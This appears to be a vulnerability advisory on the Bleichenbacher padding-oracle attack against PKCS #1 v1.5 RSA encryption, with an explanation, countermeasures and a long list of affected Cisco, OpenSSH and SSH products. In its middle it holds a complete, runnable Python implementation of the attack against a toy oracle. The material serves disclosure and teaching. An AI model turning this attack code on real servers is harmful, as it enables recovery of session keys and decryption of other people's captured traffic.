J-Security Center

Title: PKCS #1 Version 1.5 Session Key Retrieval Vulnerability

Severity: HIGH

Description:

The RSA encryption and padding methods described in RSA Laboratories' PKCS #1 standard are used by many protocols whose security relies, at least in part, on public-key cryptography.

Several protocols which implement the digital enveloping method described in version 1.5 of the PKCS #1 standard are susceptible to an adaptive chosen-ciphertext attack which may allow the recovery of session keys, thus compromising the confidentiality (and, where the same key protects it, the integrity) of the data transmitted during that session.

By capturing and logging the packets transmitted between a client and a server, an opponent can take the captured encrypted session key and launch a Bleichenbacher attack against the recipient, optionally combined with a simple timing attack on the recipient's responses. If the session key is successfully recovered, the saved packets can then be decrypted offline in a uniform manner.

The attack is possible against recipient systems whose RSA key pair is kept in use for more than a single session. By observing the recipient's response and behaviour after a PKCS #1 decryption operation, the opponent learns some information about the decryption of an arbitrary ciphertext of the opponent's choosing. The attack is feasible because the opponent knows that the decryption of any well-formed PKCS #1 v1.5 ciphertext begins with the bytes 00 02.

Under the PKCS #1 v1.5 encoding method, each time the recipient accepts a chosen ciphertext without returning an error indicating that the decryption has the wrong form, the opponent learns that the corresponding plaintext begins with 00 02, which fixes roughly two bytes of it (and possibly more, depending on how much of the padding the recipient checks). By repeating this with adaptively chosen ciphertexts, all bits of the target decryption can be computed from the bits revealed by the accepted ones.

Once a set of "good" ciphertexts is established, that is, ones for which the recipient did not respond with an error message, the opponent infers certain bits of the corresponding messages and from those bits reduces the size of the interval that must contain the unknown message. If enough good ciphertexts are found, the interval shrinks to a single value and the opponent has determined the message.

For a 1024-bit modulus, carrying out the attack requires approximately 2^20 chosen ciphertexts, which is also the number of queries sent to the recipient. For a protocol that protects the session key under two separate RSA keys, such as SSH-1 with its host key and server key, an additional 2^19 to 2^20 attempts are required.
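The interval-narrowing search described in the preceding paragraphs, as an added worked example that is not code from this advisory or from any of the affected products: a toy PKCS #1 v1.5 recipient that reveals only whether a decryption begins with 00 02 (the weakest possible oracle), and Bleichenbacher's algorithm run against it until the session key falls out. The 234-bit RSA key (built from two Mersenne primes so that no prime generation is needed), the 16-byte "session key" and the oracle function are all constructed for the demonstration; the timing side channel mentioned above is not modelled, the oracle simply answers accept or reject.

```python
"""Bleichenbacher (1998) adaptive chosen-ciphertext attack on a PKCS #1 v1.5
padding oracle, on a deliberately tiny RSA key. Everything here is constructed."""
import random

# Toy RSA key: p and q are the Mersenne primes 2^127-1 and 2^107-1, so no prime
# generation is needed. The 234-bit modulus is far too small for real use; the
# same algorithm needs roughly 2^20 queries against a 1024-bit modulus.
P, Q = (1 << 127) - 1, (1 << 107) - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8      # modulus length in bytes (30)
B = 1 << (8 * (K - 2))             # a conformant block, as an integer, lies in [2B, 3B)


def pkcs1_v15_pad(msg, rng):
    """Encryption block EB = 00 || 02 || PS || 00 || M with PS >= 8 non-zero bytes.
    rng is a seeded random.Random here only to keep the demo reproducible."""
    ps_len = K - 3 - len(msg)
    assert ps_len >= 8, "message too long for this modulus"
    ps = bytes(rng.randrange(1, 256) for _ in range(ps_len))
    return b"\x00\x02" + ps + b"\x00" + msg


def pkcs1_v15_unpad(block):
    assert block[:2] == b"\x00\x02"
    return block[block.index(b"\x00", 2) + 1:]


def rsa_encrypt(block):
    return pow(int.from_bytes(block, "big"), E, N)


def padding_oracle(c):
    """What the opponent observes from the recipient: accept or reject. Only the
    leading 00 02 is checked here (the weakest oracle); stricter checks of PS
    and the 00 separator only raise the number of queries needed."""
    return pow(c, D, N).to_bytes(K, "big")[:2] == b"\x00\x02"


def ceildiv(a, b):
    return -(-a // b)


def bleichenbacher(c0, oracle):
    """Recover m = c0^d mod N using only the oracle (D is never touched). c0 must be
    conformant, as a captured real ciphertext is, so s0 = 1 and the paper's step 1
    is skipped. Returns (m, number of oracle queries)."""
    queries = 0

    def conformant(s):
        nonlocal queries
        queries += 1
        return oracle((c0 * pow(s, E, N)) % N)   # decrypts to m*s mod N

    assert oracle(c0), "c0 is not a valid PKCS #1 ciphertext"
    intervals = [(2 * B, 3 * B - 1)]             # M_0: all that is known about m
    s = ceildiv(N, 3 * B)                        # step 2.a: smallest s >= N/(3B)
    while not conformant(s):
        s += 1
    while True:
        # Step 3: keep every (interval, r) pair consistent with m*s - r*N in [2B, 3B).
        new = set()
        for a, b in intervals:
            for r in range(ceildiv(a * s - 3 * B + 1, N), (b * s - 2 * B) // N + 1):
                lo = max(a, ceildiv(2 * B + r * N, s))
                hi = min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    new.add((lo, hi))
        intervals = sorted(new)
        if len(intervals) == 1 and intervals[0][0] == intervals[0][1]:
            return intervals[0][0], queries      # step 4: interval collapsed to m
        if len(intervals) > 1:                   # step 2.b: several intervals left
            s += 1
            while not conformant(s):
                s += 1
        else:                                    # step 2.c: one interval, roughly halve it
            a, b = intervals[0]
            r = ceildiv(2 * (b * s - 2 * B), N)
            while True:
                cands = range(ceildiv(2 * B + r * N, b), (3 * B - 1 + r * N) // a + 1)
                s_new = next((cand for cand in cands if conformant(cand)), None)
                if s_new is not None:
                    s = s_new
                    break
                r += 1


def demo():
    """Encrypt a constructed 16-byte session key, then recover it from the oracle."""
    session_key = bytes.fromhex("00112233445566778899aabbccddeeff")     # constructed
    c = rsa_encrypt(pkcs1_v15_pad(session_key, random.Random(2024)))   # the captured ciphertext
    m, queries = bleichenbacher(c, padding_oracle)
    return session_key, pkcs1_v15_unpad(m.to_bytes(K, "big")), queries


if __name__ == "__main__":
    key, recovered, n_queries = demo()
    print(f"recovered {recovered.hex()} after {n_queries} oracle queries, match={key == recovered}")
```

Running the script prints the recovered key and the number of oracle queries, a few thousand at this key size against the roughly 2^20 quoted above for 1024 bits. Note that bleichenbacher() never uses D: it only multiplies the captured ciphertext by s^e mod N and asks the recipient whether the result decrypts to something starting with 00 02. The fix implied by the advisory is to remove that oracle, either by making the recipient behave identically for malformed and well-formed padding (TLS does this by substituting a random premaster secret; RFC 3218 describes the same countermeasure for CMS) or by moving to the OAEP encoding of PKCS #1 v2.0.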

The impact of the attack depends on the protocol of interest. Interactive key establishment protocols such as SSH-1 or SSL are generally far more susceptible, because a target server will process many messages and may reveal whether each decryption succeeded or failed. However, such protocols often limit the lifetime of the public key, so the attack must be completed within that window. In the case of SSH-1, the server key is regenerated by default after one hour.

This problem makes it possible for an opponent to compromise potentially sensitive traffic between a client and server if the session key can be successfully recovered.

All versions of WebNS for the Cisco CSS 11000 series prior to 4.01 B42s, 4.10 B22s, 5.0 B11s, and 5.01 B6s are vulnerable to this issue; those releases themselves are not affected.

Affected Products:

  • Blue Coat Systems Security Gateway OS 2.1.5001 SP1
  • Cisco CSS11000 Content Services Switch
  • Cisco CSS11050 Content Services Switch
  • Cisco CSS11150 Content Services Switch
  • Cisco CSS11501 Content Services Switch
  • Cisco CSS11503 Content Services Switch
  • Cisco CSS11506 Content Services Switch
  • Cisco CSS11800 Content Services Switch
  • Cisco Catalyst 6000 6.2.0(0.110)
  • Cisco IOS 12.0S
  • Cisco IOS 12.1DB
  • Cisco IOS 12.1DC
  • Cisco IOS 12.1E
  • Cisco IOS 12.1EC
  • Cisco IOS 12.1EX
  • Cisco IOS 12.1EY
  • Cisco IOS 12.1EZ
  • Cisco IOS 12.1T
  • Cisco IOS 12.1XA
  • Cisco IOS 12.1XB
  • Cisco IOS 12.1XC
  • Cisco IOS 12.1XD
  • Cisco IOS 12.1XE
  • Cisco IOS 12.1XF
  • Cisco IOS 12.1XG
  • Cisco IOS 12.1XH
  • Cisco IOS 12.1XI
  • Cisco IOS 12.1XJ
  • Cisco IOS 12.1XK
  • Cisco IOS 12.1XL
  • Cisco IOS 12.1XM
  • Cisco IOS 12.1XP
  • Cisco IOS 12.1XQ
  • Cisco IOS 12.1XR
  • Cisco IOS 12.1XS
  • Cisco IOS 12.1XT
  • Cisco IOS 12.1XU
  • Cisco IOS 12.1XV
  • Cisco IOS 12.1XY
  • Cisco IOS 12.1YA
  • Cisco IOS 12.1YB
  • Cisco IOS 12.1YC
  • Cisco IOS 12.1YD
  • Cisco IOS 12.1YF
  • Cisco IOS 12.2
  • Cisco IOS 12.2T
  • Cisco IOS 12.2XA
  • Cisco IOS 12.2XD
  • Cisco IOS 12.2XE
  • Cisco IOS 12.2XH
  • Cisco IOS 12.2XQ
  • Cisco PIX Firewall 5.2.0(5)
  • Cisco PIX Firewall 5.3.0(1)
  • Cisco WebNS 3.0.0
  • Cisco WebNS 3.1.0
  • Cisco WebNS 4.0.0
  • Cisco WebNS 4.0.01B23s
  • Cisco WebNS 4.0.01B29s
  • Cisco WebNS 4.0.1
  • Cisco WebNS 4.0.1B19s
  • Cisco WebNS 4.1.00B13s
  • Cisco WebNS 4.1.00B17s
  • Conectiva Linux 5.1.0
  • OpenSSH OpenSSH 1.2.3
  • OpenSSH OpenSSH 2.1.0
  • OpenSSH OpenSSH 2.1.1
  • S.u.S.E. Linux 7.0.0 alpha
  • S.u.S.E. Linux 7.0.0 i386
  • S.u.S.E. Linux 7.0.0 ppc
  • S.u.S.E. Linux 7.0.0 sparc
  • SSH Communications Security SSH 1.2.31
